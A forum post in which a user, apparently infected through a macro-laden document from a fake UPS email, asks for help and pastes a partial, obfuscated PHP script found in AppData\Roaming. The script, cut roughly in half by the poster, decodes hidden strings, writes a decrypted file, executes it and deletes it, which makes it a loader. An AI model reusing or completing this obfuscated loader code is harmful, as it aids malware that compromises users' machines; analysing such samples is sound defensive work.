I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum..
If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware..
Script:
<?php
$GLOBALS['38744245'] = Array(
'cu' . 'rl_multi_exec',
'm' . 'ss' . 'ql_re' . 's' . 'ult',
'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts',
'' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents',
'ex' . 'ec',
'' . 'unlink',
'' . 'strpos',
'fg' . 'etcs' . 'v',
'strnat' . 'cmp',
'strlen',
'm' . 't_' . 'rand',
'p' . 're' . 'g_repla' . 'ce_callb' . 'ack',
'ch' . 'r',
'ord',
'st' . 'r' . 'po' . 's',
'array_' . 'fi' . 'lter',
's' . 'e' . 'ssion_is_r' . 'egist' . 'ered',
's' . 't' . 'rpos',
'cr' . 'eate_func' . 'tion',
'i' . 'm' . 'agecreatefrom' . 'gd2part',
'mt_' . 'rand'
);
?><?php
function _1369297363($taqqmn)
{
$cabbfl = Array(
"\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e",
"\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21",
'i',
'bxhndsxsexibrxben',
'gdz',
'',
'lxdgilfgvccek',
'vz'
);
return $cabbfl[$taqqmn];
}
?><?php
$ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.;
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
$GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm);
$ovehlgp = _1369297363(0);
$czdwupq = _1369297363(1);
while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6))
$GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf);
$ovehlgp = gnnnesr($ovehlgp, $ucdxetr);
$czdwupq = gnnnesr($czdwupq, $ucdxetr);
$yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp);
if ($yxfgkhr) {
$ghktwqf = gnnnesr($yxfgkhr, $ucdxetr);
$GLOBALS['38744245'][3]($czdwupq, $ghktwqf);
$GLOBALS['38744245'][4]($czdwupq);
while (!$GLOBALS['38744245'][5]($czdwupq))
Sleep(round(0 + 1));
$ptdybmu = _1369297363(2);
}
function tpugtze($acdfplp, $gsseqei)
{
$wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false)
$GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq);
return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
}
function gnnnesr($rgyctvo, $ucdxetr)
{
$qaptxjz = _1369297363(5);
while (round(0 + 3667) - round(0 + 3667))
$GLOBALS['38744245'][8]($yxfgkhr);
[END PORTION OF CODE REMOVED]
?>